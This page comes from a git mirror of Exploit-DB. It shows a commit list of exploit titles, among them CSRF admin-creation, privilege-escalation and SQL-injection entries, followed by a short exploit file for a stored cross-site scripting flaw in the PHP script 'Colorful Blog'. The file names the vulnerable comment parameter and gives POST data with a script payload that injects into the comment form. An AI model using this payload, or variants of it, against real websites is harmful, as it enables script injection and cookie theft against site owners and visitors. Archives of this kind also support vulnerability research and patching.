bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40526.txt
Offensive Security f49abcf00f DB: 2016-10-14 
13 new exploits

Linux Kernel 4.6.3 - Netfilter Privilege Escalation (Metasploit)
Linux Kernel 4.6.3 - 'Netfilter' Privilege Escalation (Metasploit)
ASLDRService ATK Hotkey 1.0.69.0 - Unquoted Service Path Privilege Escalation
Thatware 0.4.6 - SQL Injection
InsOnSrv Asus InstantOn 2.3.1.1 - Unquoted Service Path Privilege Escalation
Simple Blog PHP 2.0 - Multiple Vulnerabilities
Simple Blog PHP 2.0 - SQL Injection

Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (Access /etc/shadow)
Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Access /etc/shadow)

Simple PHP Blog 0.8.4 - (Add Admin) Cross-Site Request Forgery
Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)

miniblog 1.0.1 - (Add New Post) Cross-Site Request Forgery
miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)

PHP Press Release - (Add Admin) Cross-Site Request Forgery
PHP Press Release - Cross-Site Request Forgery (Add Admin)
Maian Weblog 4.0 - (Add New Post) Cross-Site Request Forgery
Spacemarc News - (Add New Post) Cross-Site Request Forgery
Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)
Spacemarc News - Cross-Site Request Forgery (Add New Post)
BirdBlog 1.4.0 - (Add New Post) Cross-Site Request Forgery
phpEnter 4.2.7 - (Add New Post) Cross-Site Request Forgery
BirdBlog 1.4.0 - Cross-Site Request Forgery (Add New Post)
phpEnter 4.2.7 - Cross-Site Request Forgery (Add New Post)

ApPHP MicroBlog 1.0.2 - (Add New Author) Cross-Site Request Forgery
ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)

ApPHP MicroCMS 3.9.5 - (Add Admin) Cross-Site Request Forgery
ApPHP MicroCMS 3.9.5 - Cross-Site Request Forgery (Add Admin)
ATKGFNEXSrv ATKGFNEX 1.0.11.1 - Unquoted Service Path Privilege Escalation
VOX Music Player 2.8.8 - '.pls' Denial of Service
IObit Malware Fighter 4.3.1 - Unquoted Service Path Privilege Escalation
Colorful Blog - Stored Cross Site Scripting
Colorful Blog - Cross-Site Request Forgery (Change Admin Password)
Hotspot Shield 6.0.3 - Unquoted Service Path Privilege Escalation
RSS News AutoPilot Script 1.0.1 / 3.1.0 - Admin Panel Authentication Bypass
JonhCMS 4.5.1 - SQL Injection
2016-10-14 05:01:16 +00:00

20 lines
834 B
Text
Executable file
Raw Blame History

# Exploit Title : ----------- : Colorful Blog - Stored Cross Site Scripting
# Author : ----------------- : Besim
# Google Dork : --------- : -
# Date : -------------------- : 13/10/2016
# Type : -------------------- : webapps
# Platform : --------------- : PHP
# Vendor Homepage :-- : -
# Software link : --------- : http://wmscripti.com/php-scriptler/colorful-blog-scripti.html
Description :
# Vulnerable link : http://site_name/path/single.php?kat=kat&url='post_name'
*-*-*-*-*-*-*-*-* Stored XSS Payload *-*-*-*-*-*-*-*-*
*-* Vulnerable URL : http://site_name/path/single.php?kat=kat&url='post_name' --- Post comment section
*-* Vuln. Parameter : adsoyad
*-* POST DATA : adsoyad=<script>alert('document.cookie')</script>&email=besim@yopmail.com&web=example.com&mesaj=Nice, blog post
Reference in a new issue View git blame Copy permalink